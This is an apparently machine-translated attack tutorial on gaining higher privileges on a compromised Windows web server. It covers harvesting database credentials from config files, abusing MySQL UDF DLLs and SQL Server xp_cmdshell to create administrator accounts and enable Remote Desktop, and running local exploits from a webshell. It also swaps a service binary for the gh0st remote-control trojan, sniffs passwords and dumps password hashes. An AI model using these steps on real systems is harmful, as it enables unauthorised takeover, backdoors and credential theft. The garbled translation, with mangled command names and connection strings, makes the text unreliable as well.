Details about alternative technologies for server Elevation of Privilege

1. Search for the configuration file and view the config. asp config. php conn. asp inc directory under the website directory to find the account and password with high permissions.

 
For example, the root password SA password.
 
// [CH] modify the following variables based on the account parameters provided by the Space Provider. If you have any questions, contact the server provider.
 
$ Dbhost = localhost;
 
// Database Server
 
$ Dbuser = root;
 
// Database username
 
$ Dbpw = 123;
 
// Database Password
 
$ Dbname = discuz;
 
// Database Name
 
$ Pconnect = 0;
 
// Database persistent connection 0 = closed, 1 = hit
 
Get the root account password:
 
Root
 
123
 
Privilege Escalation using MySQL root
 
DLL has been successfully exported to c: \ windows \ system32 \ mysqlDll_1269695183.dll
 
Function state already exists
 
Select state ("net user yhsafe/add ")
 
Successful SQL statement execution: Resource id #2
 
Array
 
(
 
[0] => the command is successfully completed.
 
Succeed!
 
[State ("net user yhsafe/add")] => the command is successfully completed.
 
Succeed!
 
)
 
Use SA to escalate Permissions
 
Server = localhost; UID = saWD = 123; database = masterrovider = SQLOLEDB
 
If xp_cmdshell is not executed, remember to restore xp_cmdshell first.
 
Exec master. dbo. xp_{shell net user yhsafe.com yhsafe/add
 
Exec master. dbo. xp_mongoshell net localgroup administrators yhsafe.com/add
 
Enable 3389:
 
Exec master. dbo. xp_mongoshell C: inetpubwwwrootbs3389.exe 3389
 
Returned results:
 
Now opening terminate service... Success!
 
5.2
 
OK...
 
Enabled successfully
 
2. Escalate permissions by exploiting software configuration vulnerabilities or local overflow.
 
"Brazilian barbecue" Elevation of Privilege:
 
Run ch.exe "net user 123 123/add" in webshell"
 
360 Elevation of Privilege:
 
360. exe 3389 // The Remote Desktop is enabled.
 
Press shift under 5 to pop up CMD
 
3. replacement service method
 
C: ftpFtpServer.exe
 
Rename ftpserver.exe to FtpServer1.exe
 
Upload a remote control program for bounce. For example, gh0st
 
Gh0st is renamed ftpserver.exe
 
4. Use webshell for sniffer
 
Ftp http passwords that can be sniffer to the entire server.
 
Wireshark professional tools are required to view passwords.
 
5. dump Password
 
Dump requires administrator or even system Permissions
 
Dump out the hash to further penetrate the Intranet